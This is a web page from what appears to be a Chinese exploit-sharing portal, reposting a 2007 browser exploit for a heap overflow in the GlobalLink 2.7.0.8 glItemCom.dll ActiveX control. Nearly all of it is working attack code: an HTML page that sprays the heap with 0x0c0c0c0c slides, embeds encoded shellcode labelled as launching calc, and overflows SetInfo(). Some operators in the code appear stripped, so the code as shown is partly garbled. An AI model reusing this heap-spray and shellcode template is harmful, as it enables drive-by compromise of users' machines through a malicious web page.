首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit


http://www.gipsky.com/
<html>
<body>
<object id="gl" classid="clsid:1C9B434A-0898-498A-B802-B00FA0962214"></object>
<script>
document.write("<meta http-equiv=\"refresh\" content=\"1, " window.location.href "\"></meta>");

var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape(
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"
// exec calc
"%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%uf513"
"%ue2ce%u8369%ufceb%uf4e2%u2609%u69a6%ucef5%u2c69"
"%u45c9%u6c9e%ucf8d%ue20d%ud6ba%u3669%ucfd5%u2009"
"%ufa7e%u6869%uff1b%uf022%u4a59%u1d22%u0ff2%u6428"
"%u0cf4%u9d09%u9ace%u6dc6%u2b80%u3669%ucfd1%u0f09"
"%uc27e%ue2a9%ud2aa%u82e3%ud27e%u6869%u471e%u4dbe"
"%u0df1%ua9d3%u4591%u59a2%u0e70%u659a%u8e7e%ue2ee"
"%ud285%ue24f%uc69d%u6009%u4e7e%u6952%ucef5%u0169"
"%u91c9%u9fd3%u9895%u916b%u0e76%u3999%u3e9d%u6d68"
"%ua6aa%u977a%uc07f%u96b5%uad12%u0583%uce96%u69e2"
);

var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize 0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();

for (i=0;i<heapBlocks;i )
{
memory[i] = spraySlide shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide = spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

var s = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "\x0c\x0c\x0c\x0c";
gl.SetInfo("", "", "", 1, 1, 1, "", s);
</script>
</body>
</html>

[2007-09-05]
<< AnyInventory <= 2.0 (environment.php) Remote File Inclusion Vuln Trend Micro ServerProtect eng50.dll Remote Stack Overflow Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号